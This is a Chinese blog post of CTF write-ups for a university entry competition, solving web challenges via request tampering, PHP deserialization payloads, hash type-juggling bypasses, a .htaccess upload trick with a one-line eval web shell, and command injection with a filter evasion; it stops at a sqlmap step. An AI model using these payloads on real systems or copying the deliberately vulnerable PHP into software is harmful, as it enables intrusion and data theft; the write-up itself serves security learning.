<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/bug-ddblog-punish/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/bug-ddblog-punish/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/bug-ddblog-punish/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/bug-ddblog-punish/images/logo.svg" color="#222">

<link rel="stylesheet" href="/bug-ddblog-punish/css/main.css">


<link rel="stylesheet" href="/bug-ddblog-punish/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/bug-ddblog-punish/lib/pace/pace-theme-center-atom.min.css">
  <script src="/bug-ddblog-punish/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"giant-whale.gitee.io","root":"/bug-ddblog-punish/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="CUMTCTF 入门赛">
<meta property="og:type" content="article">
<meta property="og:title" content="CUMTCTF-Entry-Competition">
<meta property="og:url" content="https://giant-whale.gitee.io/bug-ddblog-punish/p/24157/index.html">
<meta property="og:site_name" content="bugDD">
<meta property="og:description" content="CUMTCTF 入门赛">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2020/11/28/SohFTK1D87ErAdu.png">
<meta property="og:image" content="https://i.loli.net/2020/11/28/uhI5wdGcitE7Kr8.png">
<meta property="og:image" content="https://i.loli.net/2020/11/28/p58KeRCujbkHItq.png">
<meta property="og:image" content="https://i.loli.net/2020/11/28/Mn7lYETuLkQwHGI.png">
<meta property="og:image" content="https://i.loli.net/2020/11/28/stZPRCAmW5SGaoy.png">
<meta property="article:published_time" content="2020-11-27T14:41:03.000Z">
<meta property="article:modified_time" content="2020-11-28T10:12:57.817Z">
<meta property="article:author" content="Zhou Hao">
<meta property="article:tag" content="CUMTCTF">
<meta property="article:tag" content="Writeup">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2020/11/28/SohFTK1D87ErAdu.png">

<link rel="canonical" href="https://giant-whale.gitee.io/bug-ddblog-punish/p/24157/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>CUMTCTF-Entry-Competition | bugDD</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/bug-ddblog-punish/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">bugDD</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">bugDD Blog</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/bug-ddblog-punish/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/bug-ddblog-punish/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://giant-whale.gitee.io/bug-ddblog-punish/p/24157/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/bug-ddblog-punish/images/avatar.gif">
      <meta itemprop="name" content="Zhou Hao">
      <meta itemprop="description" content="bugDD的日常总结">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="bugDD">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          CUMTCTF-Entry-Competition
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-11-27 22:41:03" itemprop="dateCreated datePublished" datetime="2020-11-27T22:41:03+08:00">2020-11-27</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-11-28 18:12:57" itemprop="dateModified" datetime="2020-11-28T18:12:57+08:00">2020-11-28</time>
              </span>

          
            <div class="post-description">CUMTCTF 入门赛</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><h3 id="签到"><a href="#签到" class="headerlink" title="签到"></a>签到</h3><blockquote>
<p>Author: 周浩</p>
</blockquote>
<p>访问<a target="_blank" rel="noopener" href="http://219.219.61.234:32000/">http://219.219.61.234:32000/</a>得到回显：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">let us GET it</span><br></pre></td></tr></table></figure>

<p>于是传入GET参数：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;219.219.61.234:32000&#x2F;?it</span><br></pre></td></tr></table></figure>

<p>得到回显：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">What is the name of our mass organizations?</span><br><span class="line">FULL?</span><br></pre></td></tr></table></figure>

<p>传入BXS：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;219.219.61.234:32000&#x2F;?it&#x3D;BXS</span><br></pre></td></tr></table></figure>

<p>得到回显：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">What is the name of our mass organizations?</span><br><span class="line">plese POST we ARE champion.</span><br></pre></td></tr></table></figure>

<p>于是在BurpSuite中构造以下数据包发送：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">POST &#x2F;?it&#x3D;BXS HTTP&#x2F;1.1</span><br><span class="line">Host: 219.219.61.234:32000</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla&#x2F;5.0 (Windows NT 10.0; Win64; x64) AppleWebKit&#x2F;537.36 (KHTML, like Gecko) Chrome&#x2F;86.0.4240.183 Safari&#x2F;537.36</span><br><span class="line">Accept: text&#x2F;html,application&#x2F;xhtml+xml,application&#x2F;xml;q&#x3D;0.9,image&#x2F;avif,image&#x2F;webp,image&#x2F;apng,*&#x2F;*;q&#x3D;0.8,application&#x2F;signed-exchange;v&#x3D;b3;q&#x3D;0.9</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: zh-CN,zh;q&#x3D;0.9</span><br><span class="line">Connection: close</span><br><span class="line">Content-Type: application&#x2F;x-www-form-urlencoded</span><br><span class="line">Content-Length: 11</span><br><span class="line"></span><br><span class="line">we&#x3D;champion</span><br></pre></td></tr></table></figure>

<p>得到flag得Base64值，解码即得flag。</p>
<h3 id="签到序列化"><a href="#签到序列化" class="headerlink" title="签到序列化"></a>签到序列化</h3><blockquote>
<p>Author: 周浩</p>
</blockquote>
<p>使用dirsearch脚本扫一下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 dirsearch.py -u http:&#x2F;&#x2F;219.219.61.234:35000&#x2F; -e *</span><br></pre></td></tr></table></figure>

<p>发现有**.git**目录，但是并没有源代码泄露，弃之。</p>
<p>发现<strong><a target="_blank" rel="noopener" href="http://www.zip/">www.zip</a></strong>，下载，得源码。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">c</span></span>&#123;</span><br><span class="line">    <span class="keyword">private</span> $a = <span class="string">&#x27;BBXXSS&#x27;</span>;</span><br><span class="line">    <span class="keyword">protected</span> $b = <span class="string">&#x27;SSXXBB&#x27;</span>;</span><br><span class="line">    <span class="keyword">public</span> $z=<span class="string">&#x27;XXBBSS&#x27;</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params">$a,$b,$z</span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;a = $a;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;b = $b;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;z = $z;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">$this</span>-&gt;b!=<span class="number">777</span>) &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;&lt;/br&gt;NO!!!hacker!!!&lt;/br&gt;&quot;</span>;</span><br><span class="line">            <span class="keyword">die</span>();</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">$this</span>-&gt;z!=<span class="number">4396</span>) &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;&lt;/br&gt;NO!!!hacker!!!&lt;/br&gt;&quot;</span>;</span><br><span class="line">            <span class="keyword">die</span>();</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">$this</span>-&gt;a=== <span class="string">&#x27;BXS&#x27;</span>) &#123;</span><br><span class="line">            <span class="keyword">echo</span><span class="string">&quot;************这是啥，懂我意思八*******************&quot;</span>;</span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;&lt;/br&gt;OH NO&lt;/br&gt;i can&#x27;t give you flag!&quot;</span>;</span><br><span class="line">            <span class="keyword">die</span>();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">&#x27;username&#x27;</span>]) <span class="keyword">and</span> <span class="keyword">isset</span>($_GET[<span class="string">&#x27;password&#x27;</span>]))</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">if</span> ($_GET[<span class="string">&#x27;username&#x27;</span>]!=$_GET[<span class="string">&#x27;password&#x27;</span>]&amp;&amp;sha1($_GET[<span class="string">&#x27;username&#x27;</span>])==sha1($_GET[<span class="string">&#x27;password&#x27;</span>]))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">echo</span><span class="string">&quot;success&quot;</span>;</span><br><span class="line">        $d = $_GET[<span class="string">&#x27;flag&#x27;</span>];</span><br><span class="line">        $res=unserialize(@$d);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>查看代码，先绕过sha1。</p>
<p>构造请求：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;219.219.61.234:35000&#x2F;?username[]&#x3D;a&amp;password[]&#x3D;b</span><br></pre></td></tr></table></figure>

<p>而后就是考虑反序列化的问题了。</p>
<p>没啥可说的，构造对象，序列化得其序列化值，或按照规则拼写序列化串，应注意有：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:1:&quot;c&quot;:3:&#123;s:4:&quot;\00c\00a&quot;;s:3:&quot;BXS&quot;;s:4:&quot;\00*\00b&quot;;i:777;s:1:&quot;z&quot;;i:4396;&#125;</span><br></pre></td></tr></table></figure>

<p>其中有反斜00的存在，该字符无法显示，但是需要自己加，最终的序列化串为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:1:&quot;c&quot;:3:&#123;s:4:&quot;%00c%00a&quot;;s:3:&quot;BXS&quot;;s:4:&quot;%00*%00b&quot;;i:777;s:1:&quot;z&quot;;i:4396;&#125;</span><br></pre></td></tr></table></figure>

<p>构造完整请求：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">219.219.61.234:35000&#x2F;?username[]&#x3D;a&amp;password[]&#x3D;b&amp;flag&#x3D;O:1:&quot;c&quot;:3:&#123;s:4:&quot;%00c%00a&quot;;s:3:&quot;BXS&quot;;s:4:&quot;%00*%00b&quot;;i:777;s:1:&quot;z&quot;;i:4396;&#125;</span><br></pre></td></tr></table></figure>

<p>得flag。</p>
<h3 id="easy-upload"><a href="#easy-upload" class="headerlink" title="easy_upload"></a>easy_upload</h3><blockquote>
<p>Author: 周浩</p>
</blockquote>
<p>测试发现过滤了<strong>php</strong>、<strong>pht</strong>等一系列文件。</p>
<p>在响应头可以观察这是Apache的服务器。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">Connection: Keep-Alive</span><br><span class="line">Content-Encoding: gzip</span><br><span class="line">Content-Length: 227</span><br><span class="line">Content-Type: text&#x2F;html</span><br><span class="line">Date: Fri, 27 Nov 2020 15:01:04 GMT</span><br><span class="line">Keep-Alive: timeout&#x3D;5, max&#x3D;99</span><br><span class="line">Server: Apache&#x2F;2.4.7 (Ubuntu)</span><br><span class="line">Vary: Accept-Encoding</span><br><span class="line">X-Powered-By: PHP&#x2F;5.5.9-1ubuntu4.14</span><br></pre></td></tr></table></figure>

<p>随意上传文件，发现文件并未被重命名，考虑利用Apache中间件的配置解析。</p>
<p>上传**.htaccess**文件，其内容为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AddType application&#x2F;x-httpd-php .jpg</span><br></pre></td></tr></table></figure>

<p>该配置将使Apache将jpg文件视为php脚本执行。</p>
<p>上传改后缀的一句话：</p>
<p>该jpg文件内容为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php @eval($_POST[a]);?&gt;</span><br></pre></td></tr></table></figure>

<p>使用蚁剑连接，得到Flag。</p>
<h3 id="easyunserialize"><a href="#easyunserialize" class="headerlink" title="easyunserialize"></a>easyunserialize</h3><blockquote>
<p>Author: 周浩</p>
</blockquote>
<p>打开网页，查看源代码，发现提示：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;!-- There is nothing, where is the flag! --&gt;</span><br><span class="line">&lt;!-- Do you know php source??? --&gt; </span><br></pre></td></tr></table></figure>

<p>经一番折腾，发现代码文件为index.phps，源码为：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">// code of src.php </span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">happy</span></span>&#123; </span><br><span class="line">  <span class="keyword">public</span> $file=<span class="string">&#x27;index.php&#x27;</span>;</span><br><span class="line">  <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123; </span><br><span class="line">    <span class="keyword">if</span>(!<span class="keyword">empty</span>(<span class="keyword">$this</span>-&gt;file)) </span><br><span class="line">        highlight_file(dirname (<span class="keyword">__FILE__</span>).<span class="string">&#x27;/&#x27;</span>.<span class="keyword">$this</span> -&gt;file);</span><br><span class="line">      <span class="keyword">else</span></span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;Invalid filename.&#x27;</span>);</span><br><span class="line">    </span><br><span class="line">  &#125;  </span><br><span class="line">  <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">   <span class="keyword">$this</span>-&gt; file=<span class="string">&#x27;index.php&#x27;</span>;</span><br><span class="line">  &#125; </span><br><span class="line">  <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;&#x27;</span> ;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;     </span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>($_GET[<span class="string">&#x27;file&#x27;</span>]))&#123; </span><br><span class="line">  show_source(<span class="string">&#x27;index.php&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123; </span><br><span class="line">  $file=base64_decode($_GET[<span class="string">&#x27;file&#x27;</span>]); </span><br><span class="line">  <span class="keyword">if</span>(strpos($file,<span class="string">&quot;flag&quot;</span>) !== <span class="literal">false</span>)&#123;</span><br><span class="line">    $file = str_replace(<span class="string">&quot;flag&quot;</span>, <span class="string">&quot;&quot;</span>, $file);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">echo</span> unserialize($file); </span><br><span class="line"></span><br><span class="line"><span class="comment">//flag in flag.php</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>也发现了flag在flag.php中。</p>
<p>而对应的请求路径为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;219.219.61.234:30083&#x2F;web3&#x2F;src.php</span><br></pre></td></tr></table></figure>

<p>然后分析，发现有魔术方法__wakeup，以及过滤。</p>
<p>先考虑过滤，显然，由于该过滤仅仅是将flag换为空串，因此可以双写绕过。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flflagag.php</span><br></pre></td></tr></table></figure>

<p>再考虑魔术方法绕过，我们令序列化对象数不一致即可。</p>
<p>最终的序列化串为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:5:&quot;happy&quot;:2:&#123;s:4:&quot;file&quot;;s:8:&quot;flflagag.php&quot;;&#125;</span><br></pre></td></tr></table></figure>

<p>base64编码得到最终的请求：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;219.219.61.234:30083&#x2F;web3&#x2F;src.php?file&#x3D;Tzo1OiJoYXBweSI6Mjp7czo0OiJmaWxlIjtzOjg6ImZsZmxhZ2FnLnBocCI7fQ&#x3D;&#x3D;</span><br></pre></td></tr></table></figure>

<p>得到flag。</p>
<h3 id="EZ-PHP"><a href="#EZ-PHP" class="headerlink" title="EZ PHP"></a>EZ PHP</h3><blockquote>
<p>Author: 周浩</p>
</blockquote>
<p>源代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">&#x27;tag&#x27;</span>]))&#123;</span><br><span class="line">    $tag=$_GET[<span class="string">&#x27;tag&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span> ($tag==md5($tag))</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;6啊继续.&lt;/br&gt;&quot;</span>;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;爬爬爬&quot;</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;     &quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">&#x27;num&#x27;</span>]))&#123;</span><br><span class="line">    $num = $_GET[<span class="string">&#x27;num&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(intval($num) &lt; <span class="number">4040</span> &amp;&amp; intval($num + <span class="number">1</span>) &gt; <span class="number">4041</span>)&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;OK继续&quot;</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;再试试很简单的&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;开始第二关吧&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">&#x27;getit&#x27;</span>]))&#123;</span><br><span class="line">    $getit = $_GET[<span class="string">&#x27;getit&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!strstr($getit,<span class="string">&quot; &quot;</span>))&#123;</span><br><span class="line">        $getit = str_ireplace(<span class="string">&quot;cat&quot;</span>, <span class="string">&quot;cumtctf&quot;</span>, $getit);</span><br><span class="line">        $getit = str_ireplace(<span class="string">&quot;rm&quot;</span>, <span class="string">&quot;cumtctf&quot;</span>, $getit);</span><br><span class="line">        $getit = str_ireplace(<span class="string">&quot;mv&quot;</span>, <span class="string">&quot;cumtctf&quot;</span>, $getit);</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;U R THE BEST&quot;</span>;</span><br><span class="line">        system($getit);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;凉了鸭&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;开始第三关吧&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>第一步是要绕过**a = md5(a)**，即找到0exxxxxxx其md5也为0exxxxxxx。下面是可供使用的一个：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0e215962017 &#x3D;&gt; md5 &#x3D; 0e291242476940776845150308577824</span><br></pre></td></tr></table></figure>

<p>第二个科学计数法绕过。</p>
<p>令num = 4e5就好了</p>
<p>第三个，发现检测了空格并过滤了cat，于是使用ls查看目录文件，绕过空格可用%09，cat可以用head代替。</p>
<p>最终请求为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;219.219.61.234:37000&#x2F;?tag&#x3D;0e215962017&amp;num&#x3D;4e5&amp;getit&#x3D;head%09fFLLAaaaGgggg.php</span><br></pre></td></tr></table></figure>

<p>得到Flag。</p>
<h3 id="Sql1"><a href="#Sql1" class="headerlink" title="Sql1"></a>Sql1</h3><blockquote>
<p>Author: 周浩</p>
</blockquote>
<p>使用sqlmap，检测是否可以注入。以下仅展示关键输出：</p>
